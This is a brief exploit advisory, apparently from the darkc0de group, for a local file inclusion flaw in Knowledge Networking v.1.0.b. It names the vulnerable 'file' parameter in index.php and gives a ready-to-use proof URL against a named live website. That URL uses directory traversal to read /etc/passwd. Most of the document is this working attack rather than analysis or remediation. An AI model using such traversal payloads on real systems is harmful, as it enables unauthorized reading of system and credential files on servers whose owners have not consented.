# Title : Knowledge Networking v.1.0.b Local File Inclusion Vulnerability # Description : Knowledge Networking v.1.0.b is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. # Author : d3hydr8 # Homepage : http://www.darkc0de.com # Original Post : http://forum.darkc0de.com/index.php?action=vthread&forum=12&topic=534 # Vuln: : /index.php?file=[LFI] # Proof : http://www.knowledgenet.org/index.php?file=../../../../../../../../../../etc/passwd